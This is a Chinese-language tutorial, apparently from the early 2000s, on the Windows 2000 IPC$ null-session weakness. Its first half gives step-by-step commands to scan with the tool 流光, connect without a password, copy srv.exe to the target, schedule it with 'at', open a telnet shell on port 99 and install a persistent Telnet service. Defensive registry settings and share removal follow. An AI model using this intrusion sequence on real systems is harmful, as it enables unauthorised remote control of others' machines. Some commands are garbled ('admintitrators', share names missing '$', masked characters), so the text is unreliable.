IPC是***享“命名管道”的資源,它對於程序間的通訊很重要。在遠程管理計算機和查看計算機的***享資源時使用。利用IPC我們可以與目標主機建立壹個空的連接(無需用戶名與密碼),而利用這個空的連接,我們還可以得到目標主機上的用戶列表。但是,壹些別有用心者會利用IPC,查找我們的用戶列表,並使用壹些字典工具,對我們的主機進行攻擊。
如何利用IPC漏洞
攻擊者在這裏壹般會用到《流光》這個軟件,兔子在這裏特別提醒妳,《流光》是壹款功能非常強大的軟件,在我們使用時壹定要註意,不得進行非法破壞!
{圖形=0}
第壹步:運行《流光》(現在的最新版本是4.6),按“CTRL+R”鍵彈出掃描框,我們這裏只是做個測試,目的是告訴大家這個漏洞的危害,所以我們現在隨便選擇壹段IP進行掃描。我們掃描的是127.0.0.1(如圖),其它的均使用默認,不需要改變設置。
第二步:大家打開Win2000自帶的命令提示行,註:這裏我們不是教大家怎麽破壞,只是給大家介紹這個漏洞的危害,所以下面的IP是假設的,並不存在。
1. C:\>net use \\127.0.0.1\IPC "" /user:"admintitrators"
這就是剛才用《流光》掃到的用戶名是administrators,密碼為“空”的IP地址,如果是攻擊者的話,他就會用這樣的命令來與127.0.0.1建立壹個連接,因為密碼為“空”,所以第壹個引號處就不用輸入,後面壹個雙引號裏的是用戶名,輸入administrators,命令即可成功完成。
2. C:\>copy srv.exe \\127.0.0.1\admin
先復制srv.exe上去,在流光的Tools目錄下就有(這裏的是指admin用戶的c:\winnt\system32\,大家還可以使用c、d,意思是C盤與D盤,這看妳要復制到什麽地方去了)。
3. C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1的當前時間是2002/3/19上午11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這裏設置的時間要比主機時間快,不然妳怎麽啟動啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1的當前時間是2002/3/19上午11:05,那就準備開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這裏會用到Telnet命令吧,註意端口是99。Telnet默認的是23端口,但是我們使用的是SRV在對方計算機中為我們建立壹個99端口的Shell。
雖然我們可以Telnet上去了,但是SRV是壹次性的,下次登錄還要再激活!所以我們打算建立壹個Telnet服務!這就要用到ntlm了
7.C:\>copy ntlm.exe \\127.0.0.1\admin
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(這裏的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現“DONE”的時候,就說明已經啟動正常。然後使用“net start telnet”來開啟Telnet服務!
第三步:我們使用Telnet到對方計算機上去,Telnet 127.0.0.1,接著輸入用戶名與密碼就進入了,操作就像在DOS上操作壹樣簡單!
如何防範IPC漏洞
看了上面的方法是不是覺得該檢測壹下自己是否有這個漏洞,如果有,還不趕快把這個漏洞給補上?跟我來吧,下面我們將教妳如何防範IPC漏洞的入侵
1.禁止建立空連接
我們首先運行regedit,找到如下組建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為:00000001。
2.禁止管理***享
同樣也是找到如下組鍵[HKEY_LOCAL _MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer = DWORD的鍵值改為:00000000。
3.到www.heibai.net/download/show.php?id=2194&down=1下載delshare.zip。該工具能自動永久刪除Windows 2000所有默認***享的兩個批處理文件。
4.如果還覺得麻煩的話,也可以把“net share ipc /delete”放進妳的啟動欄裏。
5.當然,最簡單的方法就是把的密碼設置得復雜壹些,以免被壹些不懷好意的人使用工具破解出來。不過想提醒大家壹點,任何復雜的密碼都有可能被破解。